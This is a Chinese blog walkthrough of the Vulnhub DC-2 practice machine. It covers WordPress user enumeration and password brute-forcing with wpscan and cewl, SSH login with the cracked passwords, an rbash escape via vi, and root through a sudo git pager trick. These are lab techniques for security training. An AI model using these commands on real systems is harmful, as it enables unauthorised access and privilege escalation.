靶机 DC-2

最新推荐文章于 2024-11-11 17:17:05 发布
最新推荐文章于 2024-11-11 17:17:05 发布
阅读量101 收藏
点赞数
分类专栏: 渗透测试 文章标签: 网络 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51559599/article/details/133975761
版权

DC_2

信息搜集

存活检测

image-20231022160608111

详细扫描

image-20231022160939629

添加 host

image-20231022161138418

后台网页扫描

image-20231022161219919

网页信息搜集

  • 主页面

    找到 flag1,提示使用 cewl 密码生成工具

    image-20231022163316142

  • wp 登陆界面

    image-20231022161248567

  • 使用 wpscan 扫描用户

    wpscan --url http://dc-2/ --enumerate u

    扫描出用户 tom、jerry、admin

    image-20231022161613540

  • 将三个用户名写入文件中以供密码爆破

    image-20231022162750849

  • 根据网页信息生成密码字典

    cewl http://dc-2/ -w mima.txt

    image-20231022162647110

  • 爆破

    wpscan --url http://dc-2/ --passwords mima.txt --usernames username

  • 成功爆破出 tom 和 jerry 的密码

    jerry,adipiscing
tom,parturient

    image-20231022162826047

  • 网页登录

    image-20231022163019101

  • flag2

    image-20231022163105437

    image-20231022163436639

    提示可以使用其他方法

ssh 登录

  • 使用之前爆破出的账密

    尝试 jerry

    image-20231022163924374

    登陆失败

  • 尝试 tom

    image-20231022164024890

    成功登录

  • 找到第三个 flag,但查看时显示被 rbash 限制

    image-20231022164114605

    rbash(Restricted Bash)是一种受限制的交互式 shell,它是 Bash shell 的一个变种。rbash 提供了一种限制用户的能力,以便他们只能在受限的环境中执行特定的操作

  • 查看可以使用的命令

    compgen -c

    image-20231022164253510

  • 发现可以使用 vi 命令

    image-20231022164348020

  • 尝试使用 vi 命令查看 flag3

    image-20231022165142813

    提示 tom 使用 su

  • su

    还是被限制

部分提权

  • rbash 绕过

    # vi进入末行之后
:set shell=/bin/bash
:shell
 
# 切换完成之后还要添加环境变量。给$PATH变量增加两个路径,用来查找命令
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

    image-20231022172557186

  • 切换 jerry 用户

    成功切换

    image-20231022172855484

  • jerry 家目录下拿到第四个 flag

    image-20231022173059596

    提示 git

提权

  • sudo -l 查看权限

    image-20231022173243685

  • [git 提权](git | GTFOBins)

    sudo git -p help config
!/bin/sh

    image-20231022174311270

    成功 root

  • final-flag

    image-20231022174236466

总结

  • wpscan 扫描用户名、爆破
  • cewl 根据网页搜集密码
  • rbash 绕过
  • git 提权
gjl_
关注
专栏目录
靶机DC-1 11111
09-25
靶机DC-1 11111
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
嵌入式学习-网络高级-Day01
Xiaomo1536的博客
11-06 1127
对于读数据以及写单个来说,在主机询问报文里面报文头中字节长度固定,都是0x0006,(1个字节的单元标识符,1个字节功能码,2个字节的地址,2个字节的数据)输入寄存器,这个和保持寄存器类似,但是也是只支持读而不能写。报文头------功能码-------起始地址-------数量--------字节计数--------数据。报文头(字节长度可能发生变化)------功能码------字节计数-------数据。报文头------功能码-------地址-------数据/断通标志(2个字节)
字节序(Byte Order)
weixin_50993868的博客
11-11 89
字节序与平台字节序转换字节序(Byte Order)是指数据在内存中存储时字节的排列顺序。由于不同的计算机体系结构可能采用不同的字节序,因此理解字节序非常重要,特别是在处理多平台数据传输或存储时。
网络安全 | 漏洞挖掘】隐藏的 DOS 技术
等风来
11-11 54
我调查了这些参数的用途,发现它们被传递给了第三方服务,且该服务的文档说明这些参数是安全的。你可以试试这样做:前往https://ash-speed.hetzner.com/并找到一个测试文件(大小大约1到10 GB),如果服务器等待URL请求完成,你可以通过大量此类请求来淹没服务器,从而导致它最终崩溃。于是我发送了一个包含1000个UUID的列表,结果网站在60秒后超时,并出现了显著的延迟。在我的案例中,这导致了客户网站的DOS攻击,问题被发现并快速修复,甚至在我报告漏洞之前。
数据安全、信息安全网络安全区别与联系
2401_88326591的博客
11-07 857
信息安全是保护信息系统免受意外或故意的非授权泄漏、传递、修改或破坏。
06 网络编程基础
Elaine2391的博客
11-07 1050
如果客户端发送的数据没有明确的结束标记,服务器可能会一直等待更多的数据,而客户端则可能因为没有收到响应而卡住。System.out.println("======以下代码是读取响应的结果======");通过这些方法,你可以确保客户端和服务器之间的通信具有明确的数据边界,避免因缺少结束标记而导致的问题。客户端收到服务器的SYN+ACK包后,发送一个ACK(确认)包,确认收到服务器的SYN+ACK包。System.out.println("接收到的数据报:" + message);
关于诊断中的各种时间参数
WE_BIG的博客
11-07 830
因为不会转载,故在这里贴出原文连接,写的非常好!条理清晰,一遍看懂@king110108。
支持 Win10 的网络环境模拟(丢包,延迟,带宽)
Skywind Inside
11-09 279
升级 Windows 10 以后,原来各种网络模拟软件都挂掉了,目前能用的就是只有 clumsy,唯一问题是不支持模拟带宽,那么平时要模拟一些糟糕的网络情况的话,是不太方便的,而开虚拟机用 Linux tc 或者设置个远程 linux 网关又很蛋疼,于是我顺便给他加了个带宽模拟功能:
VScode插件:前端每日一题
p_s_p的博客
11-11 151
VScode插件:前端每日一题 WebSocket 中的心跳是为了解决什么问题?
Suricata
最新发布
zhuge_long的专栏
11-11 176
一条ICMP报文有四个重要内容,可与相应的ICMP关键字相匹配。它们是:消息的类型、代码、ID和序列。通过ICMP的type进行匹配alert icmp any any any any (msg:"icmp流量预警";itype:8;sid:10021;
网络基础 - 传输方式的分类
chirrupy_hamal的博客
11-11 695
网络基础 - 传输方式的分类
CTF 入门指南:从零开始学习网络安全竞赛
Hacker_LaoYi的博客
11-08 1068
的一种重要形式,为广大爱好者和学习者提供了一个绝佳的平台,让他们能够在实战中提升自己的技能和知识。本指南将带您从零开始,逐步了解和掌握 CTF 的相关知识和技巧,帮助您顺利踏上网络安全竞赛的征程。,您不仅能够提升自己的网络安全技能,还能够结交志同道合的朋友,为未来的职业发展打下坚实的基础。竞赛中,参赛者需要解决一系列与网络安全相关的挑战,包括但不限于密码学、Web 安全、逆向工程、二进制漏洞挖掘、移动安全等领域。总结比赛中的经验教训,形成自己的解题思路和方法,为今后的比赛做好准备。(二)CTF 的类型。
软考教材重点内容 信息安全工程师 第 2 章 网络攻击原理
it知识分享 free for nothing..
11-06 694
软考教材重点内容 信息安全工程师 第 2 章 网络攻击原理
简简单单的UDP
网络之路Blog(其他平台同名)
11-10 996
上一篇了解了TCP的三次握手过程,目的、以及如何保证可靠性、序列号与ACK的作用,最后离开的时候四次挥手的内容,这还只是TCP内容中的冰山一角,是不是觉得TCP这个协议非常复杂,这一篇我们来了解下传输层另外一个协议UDP。「模拟器、工具合集」复制整段内容链接:https://docs.qq.com/sheet/DV0xxTmFDRFVoY1dQ?tab=7ulgil。
网络安全CTF竞赛模式、题目类别、所用工具小结
2401_88751289的博客
11-08 941
题目涉及隐写术、流量分析、电子取证、人肉搜索、数据分析、大数据统计等,覆盖面比较广,主要考察参赛选手的各种基础综合知识。Web类题型是CTF的主要题型,主要考察参赛选手是否掌握常见的Web漏洞,如XSS、文件包含、命令执行、上传漏洞、SQL注入等。参考工具:file、010Editor、Binwalk、foremost、dd、Stegsolve、Audacity、steghide、Wireshark等。、url、ascii、摩斯电码等)和加密方式(MD5、SHA、AES、DES、RSA、栅栏加密等)。
渗透DC-1靶机设计思路
05-24
2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值